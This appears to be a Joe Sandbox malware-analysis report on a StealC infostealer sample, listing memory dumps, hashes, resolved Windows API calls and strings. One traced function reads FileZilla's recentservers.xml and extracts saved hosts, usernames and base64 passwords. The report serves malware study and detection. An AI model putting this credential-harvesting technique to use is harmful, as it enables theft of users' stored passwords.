Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 623f1393379af15adc309e0f4262399c80baccfa342e10ff6e9eb13e9ce3dcb4
Instruction ID: 075010d735f2cdeabc50c3e38a19e7de821d49dafbac9e6a2e8e22ed74e1ffc6
Opcode Fuzzy Hash: 623f1393379af15adc309e0f4262399c80baccfa342e10ff6e9eb13e9ce3dcb4
Instruction Fuzzy Hash: 2CD05E7490130CDBCB04DFE0D8496DDBB78FB08312F200695D90562340EA305481CAA6

Function 006A9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,00A08398), ref: 006A9C2D
GetProcAddress.KERNEL32(75900000,00A081F8), ref: 006A9C45
GetProcAddress.KERNEL32(75900000,00A03C70), ref: 006A9C5E
GetProcAddress.KERNEL32(75900000,00A03BF8), ref: 006A9C76
GetProcAddress.KERNEL32(75900000,00A03CB8), ref: 006A9C8E
GetProcAddress.KERNEL32(75900000,00A03D78), ref: 006A9CA7
GetProcAddress.KERNEL32(75900000,00A0A448), ref: 006A9CBF
GetProcAddress.KERNEL32(75900000,00A03C28), ref: 006A9CD7
GetProcAddress.KERNEL32(75900000,00A03DC0), ref: 006A9CF0
GetProcAddress.KERNEL32(75900000,00A03E08), ref: 006A9D08
GetProcAddress.KERNEL32(75900000,00A03CD0), ref: 006A9D20
GetProcAddress.KERNEL32(75900000,00A083F8), ref: 006A9D39
GetProcAddress.KERNEL32(75900000,00A082F8), ref: 006A9D51
GetProcAddress.KERNEL32(75900000,00A08358), ref: 006A9D69
GetProcAddress.KERNEL32(75900000,00A08438), ref: 006A9D82
GetProcAddress.KERNEL32(75900000,00A03E20), ref: 006A9D9A
GetProcAddress.KERNEL32(75900000,00A03E50), ref: 006A9DB2
GetProcAddress.KERNEL32(75900000,00A0A1F0), ref: 006A9DCB
GetProcAddress.KERNEL32(75900000,00A08378), ref: 006A9DE3
GetProcAddress.KERNEL32(75900000,00A03EB0), ref: 006A9DFB
GetProcAddress.KERNEL32(75900000,00A03BE0), ref: 006A9E14
GetProcAddress.KERNEL32(75900000,00A03CE8), ref: 006A9E2C
GetProcAddress.KERNEL32(75900000,00A03F10), ref: 006A9E44
GetProcAddress.KERNEL32(75900000,00A083B8), ref: 006A9E5D
GetProcAddress.KERNEL32(75900000,00A0FDC8), ref: 006A9E75
GetProcAddress.KERNEL32(75900000,00A0FDB0), ref: 006A9E8D
GetProcAddress.KERNEL32(75900000,00A0FD68), ref: 006A9EA6
GetProcAddress.KERNEL32(75900000,00A0FD20), ref: 006A9EBE
GetProcAddress.KERNEL32(75900000,00A0FD98), ref: 006A9ED6
GetProcAddress.KERNEL32(75900000,00A0FDE0), ref: 006A9EEF
GetProcAddress.KERNEL32(75900000,00A0FD80), ref: 006A9F07
GetProcAddress.KERNEL32(75900000,00A0FD38), ref: 006A9F1F
GetProcAddress.KERNEL32(75900000,00A0FD50), ref: 006A9F38
GetProcAddress.KERNEL32(75900000,00A04880), ref: 006A9F50
GetProcAddress.KERNEL32(75900000,00A0FB28), ref: 006A9F68
GetProcAddress.KERNEL32(75900000,00A0FA20), ref: 006A9F81
GetProcAddress.KERNEL32(75900000,00A08498), ref: 006A9F99
GetProcAddress.KERNEL32(75900000,00A0FB40), ref: 006A9FB1
GetProcAddress.KERNEL32(75900000,00A080F8), ref: 006A9FCA
GetProcAddress.KERNEL32(75900000,00A0FBB8), ref: 006A9FE2
GetProcAddress.KERNEL32(75900000,00A0FC30), ref: 006A9FFA
GetProcAddress.KERNEL32(75900000,00A07E98), ref: 006AA013
GetProcAddress.KERNEL32(75900000,00A07F98), ref: 006AA02B
LoadLibraryA.KERNEL32(00A0FB58,?,006A5CA3,?,00000034,00000064,006A6600,?,0000002C,00000064,006A65A0,?,00000030,00000064,Function_00015AD0,?), ref: 006AA03D
LoadLibraryA.KERNEL32(00A0FCD8,?,006A5CA3,?,00000034,00000064,006A6600,?,0000002C,00000064,006A65A0,?,00000030,00000064,Function_00015AD0,?), ref: 006AA04E
LoadLibraryA.KERNEL32(00A0FC48,?,006A5CA3,?,00000034,00000064,006A6600,?,0000002C,00000064,006A65A0,?,00000030,00000064,Function_00015AD0,?), ref: 006AA060
LoadLibraryA.KERNEL32(00A0FB88,?,006A5CA3,?,00000034,00000064,006A6600,?,0000002C,00000064,006A65A0,?,00000030,00000064,Function_00015AD0,?), ref: 006AA072
LoadLibraryA.KERNEL32(00A0FA68,?,006A5CA3,?,00000034,00000064,006A6600,?,0000002C,00000064,006A65A0,?,00000030,00000064,Function_00015AD0,?), ref: 006AA083
LoadLibraryA.KERNEL32(00A0FCF0,?,006A5CA3,?,00000034,00000064,006A6600,?,0000002C,00000064,006A65A0,?,00000030,00000064,Function_00015AD0,?), ref: 006AA095
LoadLibraryA.KERNEL32(00A0FD08,?,006A5CA3,?,00000034,00000064,006A6600,?,0000002C,00000064,006A65A0,?,00000030,00000064,Function_00015AD0,?), ref: 006AA0A7
LoadLibraryA.KERNEL32(00A0FC60,?,006A5CA3,?,00000034,00000064,006A6600,?,0000002C,00000064,006A65A0,?,00000030,00000064,Function_00015AD0,?), ref: 006AA0B8
GetProcAddress.KERNEL32(75FD0000,00A07E18), ref: 006AA0DA
GetProcAddress.KERNEL32(75FD0000,00A0FAB0), ref: 006AA0F2
GetProcAddress.KERNEL32(75FD0000,00A0D710), ref: 006AA10A
GetProcAddress.KERNEL32(75FD0000,00A0FC18), ref: 006AA123
GetProcAddress.KERNEL32(75FD0000,00A07FF8), ref: 006AA13B
GetProcAddress.KERNEL32(734B0000,00A0A218), ref: 006AA160
GetProcAddress.KERNEL32(734B0000,00A08098), ref: 006AA179
GetProcAddress.KERNEL32(734B0000,00A0A470), ref: 006AA191
GetProcAddress.KERNEL32(734B0000,00A0FC78), ref: 006AA1A9
GetProcAddress.KERNEL32(734B0000,00A0FCC0), ref: 006AA1C2
GetProcAddress.KERNEL32(734B0000,00A07D98), ref: 006AA1DA
GetProcAddress.KERNEL32(734B0000,00A07E38), ref: 006AA1F2
GetProcAddress.KERNEL32(734B0000,00A0FA38), ref: 006AA20B
GetProcAddress.KERNEL32(763B0000,00A07DB8), ref: 006AA22C
GetProcAddress.KERNEL32(763B0000,00A07E78), ref: 006AA244
GetProcAddress.KERNEL32(763B0000,00A0FA50), ref: 006AA25D
GetProcAddress.KERNEL32(763B0000,00A0FA80), ref: 006AA275
GetProcAddress.KERNEL32(763B0000,00A07FB8), ref: 006AA28D
GetProcAddress.KERNEL32(750F0000,00A0A268), ref: 006AA2B3
GetProcAddress.KERNEL32(750F0000,00A0A498), ref: 006AA2CB
GetProcAddress.KERNEL32(750F0000,00A0FA98), ref: 006AA2E3
GetProcAddress.KERNEL32(750F0000,00A07E58), ref: 006AA2FC
GetProcAddress.KERNEL32(750F0000,00A07CF8), ref: 006AA314
GetProcAddress.KERNEL32(750F0000,00A0A2E0), ref: 006AA32C
GetProcAddress.KERNEL32(75A50000,00A0FBD0), ref: 006AA352
GetProcAddress.KERNEL32(75A50000,00A07F78), ref: 006AA36A
GetProcAddress.KERNEL32(75A50000,00A0D740), ref: 006AA382
GetProcAddress.KERNEL32(75A50000,00A0FBA0), ref: 006AA39B
GetProcAddress.KERNEL32(75A50000,00A0FB70), ref: 006AA3B3
GetProcAddress.KERNEL32(75A50000,00A07FD8), ref: 006AA3CB
GetProcAddress.KERNEL32(75A50000,00A08018), ref: 006AA3E4
GetProcAddress.KERNEL32(75A50000,00A0FAC8), ref: 006AA3FC
GetProcAddress.KERNEL32(75A50000,00A0FAE0), ref: 006AA414
GetProcAddress.KERNEL32(75070000,00A08078), ref: 006AA436
GetProcAddress.KERNEL32(75070000,00A0FBE8), ref: 006AA44E
GetProcAddress.KERNEL32(75070000,00A0FC90), ref: 006AA466
GetProcAddress.KERNEL32(75070000,00A0FC00), ref: 006AA47F
GetProcAddress.KERNEL32(75070000,00A0FCA8), ref: 006AA497
GetProcAddress.KERNEL32(74E50000,00A07D18), ref: 006AA4B8
GetProcAddress.KERNEL32(74E50000,00A080B8), ref: 006AA4D1
GetProcAddress.KERNEL32(75320000,00A08038), ref: 006AA4F2
GetProcAddress.KERNEL32(75320000,00A0FAF8), ref: 006AA50A
GetProcAddress.KERNEL32(6F060000,00A07DD8), ref: 006AA530
GetProcAddress.KERNEL32(6F060000,00A07D78), ref: 006AA548
GetProcAddress.KERNEL32(6F060000,00A08058), ref: 006AA560
GetProcAddress.KERNEL32(6F060000,00A0FB10), ref: 006AA579
GetProcAddress.KERNEL32(6F060000,00A07D38), ref: 006AA591
GetProcAddress.KERNEL32(6F060000,00A080D8), ref: 006AA5A9
GetProcAddress.KERNEL32(6F060000,00A07EB8), ref: 006AA5C2
GetProcAddress.KERNEL32(6F060000,00A07D58), ref: 006AA5DA
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 006AA5F1
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 006AA607
GetProcAddress.KERNEL32(74E00000,00A0FF60), ref: 006AA629
GetProcAddress.KERNEL32(74E00000,00A0D670), ref: 006AA641
GetProcAddress.KERNEL32(74E00000,00A0FFF0), ref: 006AA659
GetProcAddress.KERNEL32(74E00000,00A0FF90), ref: 006AA672
GetProcAddress.KERNEL32(74DF0000,00A07F18), ref: 006AA693
GetProcAddress.KERNEL32(6C4C0000,00A0FFD8), ref: 006AA6B4
GetProcAddress.KERNEL32(6C4C0000,00A07DF8), ref: 006AA6CD
GetProcAddress.KERNEL32(6C4C0000,00A0FE88), ref: 006AA6E5
GetProcAddress.KERNEL32(6C4C0000,00A0FF78), ref: 006AA6FD

Strings

InternetSetOptionA, xrefs: 006AA5E5
HttpQueryInfoA, xrefs: 006AA5FC

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 78c09b81222a163bebe2a74e5d3a6b22fc5e75adbe442935a160a9d158c77b44
Instruction ID: e62769a4b801fdf147d7b7870c898247c056fdd9269ca833f2a4afc0d3ff64f2
Opcode Fuzzy Hash: 78c09b81222a163bebe2a74e5d3a6b22fc5e75adbe442935a160a9d158c77b44
Instruction Fuzzy Hash: 7F624AB5602241AFC74CDFA9FD889663BF9F74C301734872BAA49C3264D7399941DB22

Function 00697710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,006A61C4,?), ref: 00697724
RtlAllocateHeap.NTDLL(00000000,?,006A61C4,?), ref: 0069772B
lstrcatA.KERNEL32(?,00A11260,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 006978DB
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 006978EF
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697903
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697917
lstrcatA.KERNEL32(?,00A104E8,?,006A61C4,?), ref: 0069792B
lstrcatA.KERNEL32(?,00A10500,?,006A61C4,?), ref: 0069793F
lstrcatA.KERNEL32(?,00A10428,?,006A61C4,?), ref: 00697952
lstrcatA.KERNEL32(?,00A10458,?,006A61C4,?), ref: 00697966
lstrcatA.KERNEL32(?,00A112E8,?,006A61C4,?), ref: 0069797A
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 0069798E
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 006979A2
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 006979B6
lstrcatA.KERNEL32(?,00A104E8,?,006A61C4,?), ref: 006979C9
lstrcatA.KERNEL32(?,00A10500,?,006A61C4,?), ref: 006979DD
lstrcatA.KERNEL32(?,00A10428,?,006A61C4,?), ref: 006979F1
lstrcatA.KERNEL32(?,00A10458,?,006A61C4,?), ref: 00697A04
lstrcatA.KERNEL32(?,00A11350,?,006A61C4,?), ref: 00697A18
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697A2C
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697A40
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697A54
lstrcatA.KERNEL32(?,00A104E8,?,006A61C4,?), ref: 00697A68
lstrcatA.KERNEL32(?,00A10500,?,006A61C4,?), ref: 00697A7B
lstrcatA.KERNEL32(?,00A10428,?,006A61C4,?), ref: 00697A8F
lstrcatA.KERNEL32(?,00A10458,?,006A61C4,?), ref: 00697AA3
lstrcatA.KERNEL32(?,00A113B8,?,006A61C4,?), ref: 00697AB6
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697ACA
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697ADE
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697AF2
lstrcatA.KERNEL32(?,00A104E8,?,006A61C4,?), ref: 00697B06
lstrcatA.KERNEL32(?,00A10500,?,006A61C4,?), ref: 00697B1A
lstrcatA.KERNEL32(?,00A10428,?,006A61C4,?), ref: 00697B2D
lstrcatA.KERNEL32(?,00A10458,?,006A61C4,?), ref: 00697B41
lstrcatA.KERNEL32(?,00A11420,?,006A61C4,?), ref: 00697B55
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697B69
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697B7D
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697B91
lstrcatA.KERNEL32(?,00A104E8,?,006A61C4,?), ref: 00697BA4
lstrcatA.KERNEL32(?,00A10500,?,006A61C4,?), ref: 00697BB8
lstrcatA.KERNEL32(?,00A10428,?,006A61C4,?), ref: 00697BCC
lstrcatA.KERNEL32(?,00A10458,?,006A61C4,?), ref: 00697BDF
lstrcatA.KERNEL32(?,00A11488,?,006A61C4,?), ref: 00697BF3
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697C07
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697C1B
lstrcatA.KERNEL32(?,?,?,006A61C4,?), ref: 00697C2F
lstrcatA.KERNEL32(?,00A104E8,?,006A61C4,?), ref: 00697C43
lstrcatA.KERNEL32(?,00A10500,?,006A61C4,?), ref: 00697C56
lstrcatA.KERNEL32(?,00A10428,?,006A61C4,?), ref: 00697C6A
lstrcatA.KERNEL32(?,00A10458,?,006A61C4,?), ref: 00697C7E

Part of subcall function 006975D0: lstrcatA.KERNEL32(331CC020,006B17FC,00697C90,80000001,006A61C4,?,?,?,?,?,00697C90,?,?,006A61C4), ref: 00697606
Part of subcall function 006975D0: lstrcatA.KERNEL32(331CC020,00000000,00000000), ref: 00697648
Part of subcall function 006975D0: lstrcatA.KERNEL32(331CC020, : ), ref: 0069765A
Part of subcall function 006975D0: lstrcatA.KERNEL32(331CC020,00000000,00000000,00000000), ref: 0069768F
Part of subcall function 006975D0: lstrcatA.KERNEL32(331CC020,006B1804), ref: 006976A0
Part of subcall function 006975D0: lstrcatA.KERNEL32(331CC020,00000000,00000000,00000000), ref: 006976D3
Part of subcall function 006975D0: lstrcatA.KERNEL32(331CC020,006B1808), ref: 006976ED
Part of subcall function 006975D0: task.LIBCPMTD ref: 006976FB

lstrcatA.KERNEL32(?,00A0D870,?,00000104), ref: 00697E0B
lstrcatA.KERNEL32(?,00A10DD0), ref: 00697E1E
lstrlenA.KERNEL32(331CC020), ref: 00697E2B
lstrlenA.KERNEL32(331CC020), ref: 00697E3B

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 896e43041bf822e69e851a8fd5e7a9c2cf68ebb6e633e9286d56eb10d3cab115
Instruction ID: c62c5e4ebbed4543c5c7452180571f4838f25b6444e6c7c9a9f0981ebc6c83c9
Opcode Fuzzy Hash: 896e43041bf822e69e851a8fd5e7a9c2cf68ebb6e633e9286d56eb10d3cab115
Instruction Fuzzy Hash: E9323FB6C10354ABCB55FBA0DC85DEA737DBB48700F044A99F219A2090EE74EB89CF55

Function 006A0250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 006A8E0B

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,006A02E7,00000000), ref: 00699A5A
Part of subcall function 006999C0: LocalFree.KERNEL32(006A02E7), ref: 00699A90
Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A

Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52

strtok_s.MSVCRT ref: 006A031B
GetProcessHeap.KERNEL32(00000000,000F423F,006B0DBA,006B0DB7,006B0DB6,006B0DB3), ref: 006A0362
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 006A0385
lstrlenA.KERNEL32(00000000), ref: 006A0393

Part of subcall function 006A88E0: malloc.MSVCRT ref: 006A88E8
Part of subcall function 006A88E0: strncpy.MSVCRT ref: 006A8903

StrStrA.SHLWAPI(00000000,<Port>), ref: 006A03CF
lstrlenA.KERNEL32(00000000), ref: 006A03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 006A0419
lstrlenA.KERNEL32(00000000), ref: 006A0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006A0463
lstrlenA.KERNEL32(00000000), ref: 006A0475
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0502
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 006A051A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 006A0532
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 006A054A
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 006A0562
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 006A0571
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 006A0580
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 006A0593
lstrcatA.KERNEL32(?,006B1678,?,?,00000000), ref: 006A05A2
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 006A05B5
lstrcatA.KERNEL32(?,006B167C,?,?,00000000), ref: 006A05C4
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 006A05D3
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 006A05E6
lstrcatA.KERNEL32(?,006B1688,?,?,00000000), ref: 006A05F5
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 006A0604
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 006A0617
lstrcatA.KERNEL32(?,006B1698,?,?,00000000), ref: 006A0626
lstrcatA.KERNEL32(?,006B169C,?,?,00000000), ref: 006A0635
strtok_s.MSVCRT ref: 006A0679
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A068E
memset.MSVCRT ref: 006A06DD

Strings

Nj, xrefs: 006A02CC, 006A02F2, 006A02CF, 006A02F5
profile: null, xrefs: 006A0568
<Host>, xrefs: 006A037C
password: , xrefs: 006A05FB
<User>, xrefs: 006A0410
login: , xrefs: 006A05CA
<Pass encoding="base64">, xrefs: 006A045A
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 006A02A4
browser: FileZilla, xrefs: 006A0559
url: , xrefs: 006A0577
<Port>, xrefs: 006A03C6
Nj, xrefs: 006A072E, 006A06AF, 006A06B2

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Nj$Nj$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-1267206248
Opcode ID: 6e6cad46ba2b1a2fbfad35a6b0cdd20c7e696cba268c618c9e625e20bd0a5255
Instruction ID: ef7032979fb2acd149efbeaf51221a817a8221d4236e6f4ad3a993110a290eea
Opcode Fuzzy Hash: 6e6cad46ba2b1a2fbfad35a6b0cdd20c7e696cba268c618c9e625e20bd0a5255
Instruction Fuzzy Hash: 06D11CB1900108ABDB84FBE4DD96EEE777ABF19300F50451AF502A6091EF34AE46CF65

